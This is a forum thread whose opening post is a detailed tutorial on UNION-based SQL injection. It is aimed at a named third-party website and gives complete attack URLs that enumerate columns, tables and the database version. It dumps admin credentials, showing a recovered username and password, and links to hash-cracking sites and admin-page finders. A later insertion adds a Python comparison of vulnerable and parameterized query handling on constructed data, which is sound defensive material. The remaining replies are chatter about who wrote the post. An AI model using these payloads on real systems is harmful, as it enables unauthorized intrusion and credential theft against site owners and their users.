  1. #1
    ReBorn's Avatar
    Join Date
    Feb 2012
    Posts
    80
    Points
    510

    [TUT] Super Detailed SQL Injection

    THIS IS FOR EDUCATIONAL PURPOSES ONLY, I'M NOT RESPONSIBLE IF YOU GO TO JAIL OR PRISON FOR DOING THIS.

    There are many types of SQL injection when it comes to web hacking.
    What we learned in the previous tutorial was only the basics, where we used it to bypass Admin/User logins.
    However, what will you do if you can't bypass it even though it's vulnerable to SQL injection?
    Well, the answer is simple. You do the process on your URL/Address bar instead of the text boxes on an admin/user login page.

    Common Types of SQL injection are:
    Code:
    UNION Based SQL injection
    String Based SQL injection
    Error Based SQL injection
    Double Query SQL injection
    Blind SQL injection
    MsSQL injection

    What we are going to learn today is what we call UNION Based SQL injection
    Alright before we start we need to know how a website works while it stores Login information/pages/pictures/etc. in its database
    Lets just say that our website will look like this :
    "http://www.site.com/index.php?id=5"
    Notice at the end of the URL, "id=5"
    This is what the query will look like

    SELECT * FROM index
    WHERE id = 5

    Alright, now you know a bit of how the website works, let's get hacking

    Step1: Finding the vulnerability in a website
    It'll be like a small puzzle you have to solve. See, you can't just hack a website like http://www.site.com -.-
    To hack a website, you need to scan it yourself by clicking links and find out if there's something like "index.php?id=XXX" where "XXX" is a random integer (number) or string (word).
    Alright now to find sites vulnerable to SQLi is using Google Dorks.
    If you don't know how to use dorks, visit Part 1 of this project to learn all about them
    Once you've found a site vulnerable to SQLi, it's time to execute queries.
    For this tutorial, we'll be using "http://www.leadacidbatteryinfo.org" as an example.

    Try browsing the website and see if you can find links like "index.php?id=xxx"
    It can be anything like "details.php?id=xxx" or "gallery.php?id="
    Just find an address with a number at the end of the URL
    Here's what I found "http://www.leadacidbatteryinfo.org/newsdetail.php?id=51"

    Now to test for vulnerabilities is by ADDING a quote " ' " at the end of the url i.e after the integer or string
    So it'll look like this,


    http://www.leadacidbatteryinfo.org/newsdetail.php?id=51'

    Now you'll notice an error saying

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

    This shows that the website is vulnerable to SQL injection.
    How is this possible?
    Look at the query when we added a quote " ' "

    Step2: Finding the number of columns a website has

    This is the part where most people had commonly misunderstood.
    To get to the point, what we're about to do is find how many columns the website has using NoError/Error statements.
    Alright lets get started.
    The query we'll be using is "order by X--" where "X" is a random integer (number)
    Start by entering "order by 25--"
    Enter it at the end of the URL, so it'll look like this

    http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 25--

    Error, there are no 25 columns, so it'll be less than 25

    Now lets go up to "order by 11--"

    http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 11--

    Hmm, no errors I see. So it's obvious that there could be more than 11 columns
    http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 12--
    Error! So this means the last number that returned no error is 11
    Therefore, the website has 11 columns
    An error while scanning for number of columns
    While No errors will show the page as normal

    Step3: Now that we found the number of Columns, time to Execute the UNION SELECT statement
    First off, we need to know what does "UNION SELECT" means
    Lets say we have 2 tables, "users" and "admin"
    Basically, UNION SELECT is a statement where all these information will be collected as one.
    Look at this query

    SELECT * FROM users
    UNION SELECT * FROM admin

    If we perform the UNION SELECT statement, we can get both users and admin information from their database
    The point is that, UNION SELECT returns our results with the information we need
    If you want to find vulnerable columns, use UNION SELECT
    If you want to find version of database, UNION SELECT
    If you want admin information! use UNION SELECT
    Alright, now that we know something about the Union function, lets continue.

    Take our website that has 11 columns and add a "UNION SELECT" statement.
    Here's how our query will look like

    http://www.leadacidbatteryinfo.org/n...ail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--


    This is what you would normally do if you use UNION function while SQL injecting a website

    Focus on something like this, "index.php?id=-X UNION SELECT N--"
    Where "X" is a random integer/string and "N" is the number of columns followed by two hyphens " -- " and another hyphen " - " beside "X"

    Step4: Random numbers appear on screen, the next step
    Alright I'm pretty sure you'll find a bunch of numbers showing up on the screen.
    These are known as "vulnerable columns" which states that those vulnerable columns have stored data inside them we need to extract.

    You need to inject the number at the very top (always at the very top)
    So, in this case we have number "8"
    Now you might be asking, what can I do with a vulnerable column?
    Well here's what you can get-- INFORMATION!
    You need a lot of information to study from the website, here are a couple of examples.

    Replace the vulnerable column i.e number 8 with a statement
    Statements:

    @@version, version()
    database(),
    user(),
    @@hostname
    @@datadir

    Their functions
    @@version/version() = find the version of the database
    database() = find the current database
    user() = find the user information
    @@hostname = Current hosting info
    @@datadir = directory of the data of the website

    To find the version of the database in the website, replace the vulnerable column i.e number 8 with "@@version" or "version()"
    It'll look like this

    http://www.leadacidbatteryinfo.org/n...ail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,@@version,9,10,11--

    Results:

    5.1.52-log

    So the database version is 5, which is good because it'll be easier to SQL inject the website.
    Note:
    Database version less than 5 "<5" = you need to guess tables (a bit hard work)
    Database version greater than 5 ">5" = easy to inject with another function i.e group_concat

    If you ever want to SQLi a website with version <5, then you can guess the tables with the following below

    We'll be knowing how to get the tables in the next step.
    But for now, let's see what we can get with other statements
    Lets try all statements at once shall we
    The URL will look like this,

    http://www.leadacidbatteryinfo.org/n...ail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(database(),version(),@@datadir,@@hostname,user()),9,10,11--

    Results:

    32908_leadacidbatteryinfoorg5.1.52-log/mnt/cluster/data/mysql1.my[email protected]dsite.com
    3

    We have almost every information we have about the website
    Look close here, we used a command "group_concat"
    Here's its function:
    Group_concat = Gets every information at once i.e grouping them with the help of statements. Ex. group_concat(database())
    Note:Group_concat won't work with versions less than 5


    Step5:Getting the table names
    What are tables?
    Tables contain columns and columns contain the data
    It's like a stack (table) of books (columns) and data inside the books (data inside the columns)
    Alright, first lets look up some functions we're gonna use to extract table names (Important)

    group_concat = grouping up data to a specific statement
    table_name = tables names to be shown on screen
    from = location of a specified statement
    information_schema.tables = information in the database with table names in it
    table_schema = tables in a database
    database() = current database in the website
    0x0a = a Hex code that creates a new line for organizing tables in an order

    Now lets combine those functions and make up a query that will give us the table names
    So, here's what our link will look like:

    http://www.leadacidbatteryinfo.org/n...ail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(table_name,0x0a),9,10,11 from information_schema.tables where table_schema=database()--

    In here, we replaced our vulnerable column with "group_concat(table_name,0x0a)"
    and then we added a
    "from information_schema.tables where table_schema=database()--"
    after the last column (excluding the two hyphens after 11)
    Results on table names:

    pdigclicks ,pdigengine ,pdigexcludes ,pdigincludes ,pdigkeywords ,pdiglogs ,pdigsite_page ,pdigsites ,pdigspider ,pdigtempspider ,tbladmin ,tblbanner ,tblbanner_page ,tblfaq ,tblncategory ,tblnews

    Alright now that we've found the tables, what you're gonna have to do is
    that, you have to find tables where user/admin information are stored
    In this case, "tbladmin" seems to be having an admin information stored in it.
    It's all about predicting and expecting what's behind every table you see
    Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables.
    Replace and Add the following
    Vulnerable Column = replace with "group_concat(table_name,0x0a)"
    After the last column = Add "from information_schema.tables where table_schema=database()--"
    Also, don't forget about UNION SELECT before the column numbers and the hyphen ( - ) before "X" at index.php?id=X where "X" is a random integer/string


    Step6:Getting Columns from Tables
    Alright, obviously, our next task is to get the column names from a specific table, which in our case was "tbladmin"
    To do this, we're gonna have to alter some queries a bit
    Now look closely at this syntax:

    http://www.leadacidbatteryinfo.org/n...ail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(column_name,0x0a),9,10, 11 from information_schema.columns where table_name=0x74626c61646d696e--

    Here's what we replaced:
    table_name = replaced by "column_name"
    information_schema.tables = replaced by "information_schema.columns"
    table_schema = replaced by "table_name"
    database() = replaced by "0x74626c61646d696e--"
    Now that you know the replacements in our syntax, you still might be wondering what's up with the last part where we entered "0x74626c61646d696e--"
    First of all, these are known as Hex
    To make a Hex readable, we put "0x" at the beginning
    I'll explain this briefly. So our table name was "tbladmin"
    To enter that table using the syntax above, we have to convert that table name to Hex
    In order to do that, visit this website:
    http://www.swingnote.com/tools/texttohex.php
    It's a text to hex converter
    Enter "tbladmin" in the text box and hit convert
    You'll notice the results will be "74626c61646d696e" (that's the hex)
    Now to make it readable to the website, add "0x" at the beginning
    So it will be:

    0x74626c61646d696e

    Now you know how Hex works, lets look up some functions we replaced and know their uses (Important)

    group_concat(column_name,0x0a) = grouping the column names we're going to extract
    information_schema.columns = column names stored in database
    table_name = extracting column from a specific table
    0xHEX_Code_Table = Specific table name converted to hex

    Results after extracting column names from tables:

    adminid ,username ,password ,dom

    Now that we've got the columns from that table, it's time to extract the information.
    What we're gonna need here is obviously only the "username" and "password"


    Step7:Getting Data from Columns
    Alright, lets extract the information
    Look closely at the syntax:

    http://www.leadacidbatteryinfo.org/n...ail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password, 0x0a),9,10,11 from tbladmin--

    Keep this formula-like syntax in your mind whenever you want to extract data from columns

    http://www.site.com/index.php?id=-X UNION SELECT N,group_concat(columnName,0x3a,columnName,0x0a) from "tablename"--

    Where "X" is a random integer/string followed by a hyphen ( - ) while "N" is the number/position of the column and "columnName" is the column you want to extract data while "tablename" is where you extract data from a specific table then two hyphens in the end ( -- )
    CONTINUED BELOW
    Now for revising,
    column names = username, password
    separator = 0x3a (a hex for a colon " : ")
    table name = tbladmin
    Once you execute that syntax, you get the username and password separated by a colon
    Results after executing the syntax:


    ishir:ishir123


    Username: ishir
    Password: ishir123

    Special cases: Hashed Usernames and Passwords
    Most websites will have their passwords hashed as MD5
    In this case you'll need to crack them.
    Using some websites will help you
    Here's a list of Hash cracking websites:

    www.md5decrypter.co.uk/
    www.md5this.com/
    www.md5crack.com/
    http://hashchecker.de/find.html

    An MD5 Hash will look like this:

    21232f297a57a5a743894a0e4a801fc3 -- 32 characters



    Last Step: Finding the admin page and logging in for the goods
    Alright, now that we have our admin login info
    Username: ishir
    Password: ishir123
    It's time to find the login pages
    To do this, you can use Admin Page Finders
    Here's some you can use
    >>Scorpion Admin Page Finder<<
    http://sc0rpion.ir/af/
    >>Outlaw Admin Page Finder<<
    http://www.tools.th3-0utl4ws.com/admin-finder/
    >>Napsterakos Admin Page Finder<<
    http://www.hackforums.net/showthread.php...ight=HaviJ
    >>HaviJ Injector/Cracker and Admin page finder<<
    http://www.hackforums.net/showthread.php...age+finder
    Alright after scanning the website for admin pages, you should see something like this:


    http://www.leadacidbatteryinfo.org/admin/

    Now all you have to do is enter the admin details you extracted from their databases and login as an admin!
    However, some websites could be already hacked and messed up
    Which in our case, this website was already messed up in such a way you can't login as an admin anymore.
    These are just the basics of SQL injection.
    There are lots of websites to hack and more to practice with.


    JOIN My Website: www.xcodezz.com
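
The root cause behind every step in the post above is that the `id` value is pasted into the SQL text. As an added example that is not part of the original post, the sketch below puts a concatenating handler beside a hardened one and runs the post's probes against both. It assumes Python's `sqlite3` with constructed data instead of the PHP/MySQL site in the post, a 3-column table instead of 11, and hypothetical function names.

```python
import re
import sqlite3

# Constructed sample data; table names follow the post, row values are made up.
SCHEMA = """
CREATE TABLE tblnews  (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
CREATE TABLE tbladmin (adminid INTEGER, username TEXT, password TEXT);
INSERT INTO tblnews  VALUES (51, 'Sample headline', 'Sample body');
INSERT INTO tbladmin VALUES (1, 'example_admin', 'example_secret');
"""

# The post's probes, scaled down to this 3-column table (constructed).
PROBES = {
    "normal": "51",
    "quote": "51'",
    "order_by_ok": "51 order by 3--",
    "order_by_too_many": "51 order by 4--",
    "union": "-51 UNION SELECT 1, username || ':' || password, 3 FROM tbladmin--",
}


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def news_vulnerable(db, raw_id):
    """'Before': the request value is concatenated into the statement text."""
    sql = "SELECT id, title, body FROM tblnews WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def news_hardened(db, raw_id):
    """'After': reject anything that is not a plain integer, then bind it."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    sql = "SELECT id, title, body FROM tblnews WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()


def outcome(handler, db, raw_id):
    """Return the rows, or 'db-error' where the page would show a SQL error."""
    try:
        return handler(db, raw_id)
    except sqlite3.Error:
        return "db-error"


def compare():
    """Run every probe through both handlers: {name: (before, after)}."""
    db = make_db()
    return {name: (outcome(news_vulnerable, db, value),
                   outcome(news_hardened, db, value))
            for name, value in PROBES.items()}


if __name__ == "__main__":
    for name, (before, after) in compare().items():
        print(f"{name:18} vulnerable={before!r}  hardened={after!r}")
```

With the hardened handler, the quote and `order by` probes no longer produce the error/no-error difference the post uses to count columns, and the `UNION` probe returns nothing.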

  2. #2

    Retired Prophet
    ToxicJew.'s Avatar
    Join Date
    Mar 2011
    Posts
    7,781
    Points
    7,586

    I moved this to Computer discussion for you. PC Help is for help requests, not tutorials.


    This is actually pretty cool, you never see in-depth tutorials for stuff like this.

    ส็็็็็็็็็็็็็็็็็็็็็็็็็༼ ຈل͜ຈ༽ส้้้้้้้้้้้้้้้้้้้้้้้ส็็็็็็็็็็็็็็็็็็็็ ็็็็็༼ ຈل͜ຈ༽ส้้้้้้้้้้้้้้้้้้้้้้้

  3. #3
    ReBorn's Avatar

    ok thanks


  4. #4

    Retired Prophet
    ToxicJew.'s Avatar

    Even though you didn't make it, still cool.


  5. #5
    -.-. ..- -. - Equinox's Avatar
    Join Date
    Feb 2012
    Posts
    3,229
    Points
    1,473

    i was bout to ask if he made this


  6. #6
    ReBorn's Avatar

    Me and JoeNonymous wrote this, all this shit is in the VIP section on my site im just posting it here because i love u guys <3


  7. #7
    -.-. ..- -. - Equinox's Avatar

    hmmmmmm......


  8. #8
    ReBorn's Avatar

    why'd u ditch my site, we were friends, i made u co-owner, then u just disappeared lol


  9. #9
    -.-. ..- -. - Equinox's Avatar

    i think you got this from the hackforums

    Quote, originally posted by ReBorn:
        why'd u ditch my site, we were friends, i made u co-owner, then u just disappeared lol

    because you changed me to super moderator from admin, and the usergroups on your site are wack now


  10. #10
    ReBorn's Avatar

    No, i think
    joenonymous did
